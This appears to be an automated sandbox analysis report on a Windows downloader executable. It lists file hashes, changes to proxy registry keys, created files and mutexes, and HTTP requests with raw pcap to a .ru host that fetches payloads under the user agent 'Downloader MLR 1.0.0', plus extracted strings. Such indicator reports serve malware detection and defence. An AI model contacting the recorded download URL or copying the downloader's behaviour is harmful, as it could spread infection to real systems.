Analysis Date: 2014-09-08 11:09:25
MD5: a21687eb4edd7ab624ea389a6414e98a
SHA1: 9020ccf0590d1d813675f7b5994a3b00d7fa172a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE md5: 7a8783e02f394210206143418faa9634 sha1: f5f4fb350f437178e93020f762e06e2b3e1e35a4 size: 108544
Section DATA md5: 1ae83722e96b570ab8306c8a824bf7e7 sha1: c9c1a7521c3c7c9128634cad43888ed09504ecab size: 11264
Section BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .idata md5: a456e4d5adbfb8bd8650ba9dbf1d1026 sha1: 7f7be9b15b0d81704736af083d2965e0e4e5ae90 size: 5632
Section .reloc md5: e8fbfec5efd0459497bd22bcb10b2edb sha1: 4b5156768455d6e0dc6e0a646c553fd27b8597ac size: 7680
Section .rsrc md5: 1d648c7e6687a55e473b1c4cee276c2a sha1: 723a02ae08fb782a872b0c4b2b5a47456cf755a5 size: 20480
Timestamp: 1992-06-19 22:22:17
PEhash: f2a5a499ddc117784c6b1c3b5597b689499a2cce
IMPhash: c618d6818c3ad46def39196135c120d8

Runtime Details:


Process
↳ C:\malware.exe

Creates Process?

Process
↳ ?

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: forces.volgamies.ru

Network Details:

DNS: forces.volgamies.ru
Type: A
193.105.245.210
HTTP GET: http://forces.volgamies.ru/get_xml?stb=1&did=571017698&file_id=128526902
User-Agent: Downloader MLR 1.0.0
HTTP GET: http://forces.volgamies.ru/get_xml?stb=1&did=571017698&file_id=128526902
User-Agent: Downloader MLR 1.0.0
Flows TCP: 192.168.1.1:1031 ➝ 193.105.245.210:80
Flows TCP: 192.168.1.1:1032 ➝ 193.105.245.210:80

Raw Pcap
0x00000000 (00000)   47455420 2f676574 5f786d6c 3f737462   GET /get_xml?stb
0x00000010 (00016)   3d312664 69643d35 37313031 37363938   =1&did=571017698
0x00000020 (00032)   2666696c 655f6964 3d313238 35323639   &file_id=1285269
0x00000030 (00048)   30322048 5454502f 312e310d 0a557365   02 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20446f77 6e6c6f61   r-Agent: Downloa
0x00000050 (00080)   64657220 4d4c5220 312e302e 300d0a48   der MLR 1.0.0..H
0x00000060 (00096)   6f73743a 20666f72 6365732e 766f6c67   ost: forces.volg
0x00000070 (00112)   616d6965 732e7275 0d0a4361 6368652d   amies.ru..Cache-
0x00000080 (00128)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000090 (00144)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f676574 5f786d6c 3f737462   GET /get_xml?stb
0x00000010 (00016)   3d312664 69643d35 37313031 37363938   =1&did=571017698
0x00000020 (00032)   2666696c 655f6964 3d313238 35323639   &file_id=1285269
0x00000030 (00048)   30322048 5454502f 312e310d 0a557365   02 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20446f77 6e6c6f61   r-Agent: Downloa
0x00000050 (00080)   64657220 4d4c5220 312e302e 300d0a48   der MLR 1.0.0..H
0x00000060 (00096)   6f73743a 20666f72 6365732e 766f6c67   ost: forces.volg
0x00000070 (00112)   616d6965 732e7275 0d0a4361 6368652d   amies.ru..Cache-
0x00000080 (00128)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000090 (00144)   650d0a0d 0a                           e....


Strings
m~.
.d
.e.U!..C
.
.[
I
9
..9
.:.
9999
9
...9.
9
.
.

;!;';:;
0 000@0P0`0p0
00050>0D0N0S0
0 0&060?0G0M0W0c0m0}0
0*080B0Q0W0]0x0
>(>0>5><>H>N>[>a>n>v>{>
05\Slf;
:$:*:0:6:<:A:G:S:Y:c:m:r:z:
: :':0:6:<:B:H:N:f:q:
0!Gt*_I
0M0X0t0z0
1%1/1=1C1M1S1Y1c1m1s1w1}1
1&1:1D1L1R1\1e1y1
1#191C1M1
161?1E1l1r1x1
171=1C1^1l1w1
19JMwMIX#;
1T&kNrJ
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
2&2,222D2J2P2_2
2$2-232=2C2M2S2_2i2q2w2~2
2"2,2S2Z2h2r2|2
2"3*323:3B3J3f3p3z3
;";*;2;:;B;J;R;Z;b;j;r;z;
:*:2:::B:J:R:Z:b:j:r:z:
2V2d2j2t2	7
">~!3%
3!31373=3C3I3T3^3d3l3}3
3$3/353>3D3J3b3h3n3t3z3
3f},<0
4'424:4A4G4R4a4g4u4}4
4#4-464G4M4
4(4.484>4D4t4~4
?(?.?4?A?I?N?U?a?k?u?
< <)<4<;<A<I<O<Z<`<f<r<x<
4.`bF"
;';.;4;:;B;L;T;Z;d;o;u;{;
> ?*?4?>?D?R?Z?d?
:$:*:4:F:L:V:
5"5.545:5@5K5U5]5c5m5v5{5
5(5.545P5Z5b5h5r5{5
5 5A5I5O5[5e5p5y5
=$=+=5=;=A=G=M=Y=_=l=r={=
=$=.=5=;=A=K=P=g=m=t=~=
>5>;>A>Q>[>c>i>s>
<(<.<5<?<E<K<Q<W<
< <'<5<;<E<L<T<g<m<v<|<
6,626B6L6V6k6~6
6!6'6-636>6T6Z6d6n6u6{6
6(6F6L6R6`6e6k6q6
=6=A=H=P=W=c=j=p=z=
<(<6<<<E<K<Q<W<^<m<x<
7-737=7_7q7
7%7/757;7A7G7M7S7\7b7h7~7
7#777B7L7R7_7i7o7u7~7
7%7/797A7H7R7X7c7{7
7B8W8h8
>$>7>=>D>Q>W>`>f>p>
?'?-?7?J?V?\?f?m?s?y?
8$828:8D8P8X8c8p8v8
8$8*848?8J8T8Z8g8q8w8}8
8HCCyL
9*909C9R9X9^9j9t9~9
9(929=9E9O9W9]9g9q9y9
9(93979G9Q9W9d9n9t9z9
9&9,939F9[9a9g9
9%9/999I9O9U9a9n9z9
=#=)=/=9=D=J=Q=[=a=g=m=s=
9]:h:M;S;a;i;s;Q<]<
9-"wG^+
>$>*>/>;>A>L>S>_>f>q>w>
AnyPopup
</assembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AssignProcessToJobObject
$;=b7=
baW'8C
B@LS`LW
,|BPz{
C91*=&
CancelTimerQueueTimer
ChooseFontA
?C?I?S?Y?_?
ClearCommBreak
comdlg32.dll
COMDLG32.DLL
CreateJobObjectA
CreateMailslotW
D2COt0<
DeleteVolumeMountPointW
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
DFKW<z
d[^t<Zf
d'[y8s
E\,"0-
EnumSystemGeoID
et2,K b/
ExitProcess
f	fF B
FindAtomA
FindFirstVolumeMountPointA
FindNextFileA
F op,;
GA=D1=
GetCommandLineA
GetCommMask
GetConsoleTitleW
GetCPInfoExA
GetFileTitleA
GetFileVersionInfoW
GetProfileStringA
GetSystemDefaultLangID
GetSystemInfo
GetTimeFormatW
GlobalDeleteAtom
GlobalFindAtomW
.:G[yn,
}h8!OM
Heap32ListFirst
;";);/;>;H;P;V;`;s;~;
HueIrF
-%,i:%
I]#9.pa
.idata
IsBadStringPtrW
IsValidCodePage
J=E-5 
-J~K+qy{s
/	JLYB
joZHD]
k5'O{c6~(
K>e9&vEc
kernel32.dll
KERNEL32.DLL
?k>Gn5
\<l5eN
LoadLibraryA
LocalAlloc
LocalUnlock
LockFileEx
m6Mb\}
"N`?P+J"(
=<?O?b?u?
OhHi9D
OpenJobObjectA
=O=U=b=h=w=
o.y _*
PageSetupDlgW
P.rsrc
/q&!K8
qnfvgFc
@R/6QB
.reloc
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
<requestedPrivileges>
R'yL'vv"
</security>
<security>
SetInformationJobObject
}SFXX&
-&sJM+I^
sQhxFt
SystemTimeToTzSpecificLocalTime
T7X7d7h7l7p7t7x7|7
;td+G0:
t/f950 B
This program must be run under Win32
TlsAlloc
TlsFree
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
u@:59 B
uR/*~\
\U+rd"
user32.dll
v,]BjN
VerFindFileW
VerInstallFileA
VerQueryValueA
version.dll
VERSION.DLL
VirtualLock
=vVR=J
WaitForMultipleObjects
WantArrows
WriteConsoleOutputA
WriteTapemark
wtsapi32.dll
WTSAPI32.DLL
WTSCloseServer
WTSEnumerateProcessesA
WTSRegisterSessionNotification
WTSSendMessageW
WTSVirtualChannelPurgeOutput
WTSWaitSystemEvent
",&|Xa
XbTdXSv
.xG3{S
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
y5k4:d
'z2xO8
)ZFeO9
Zj75T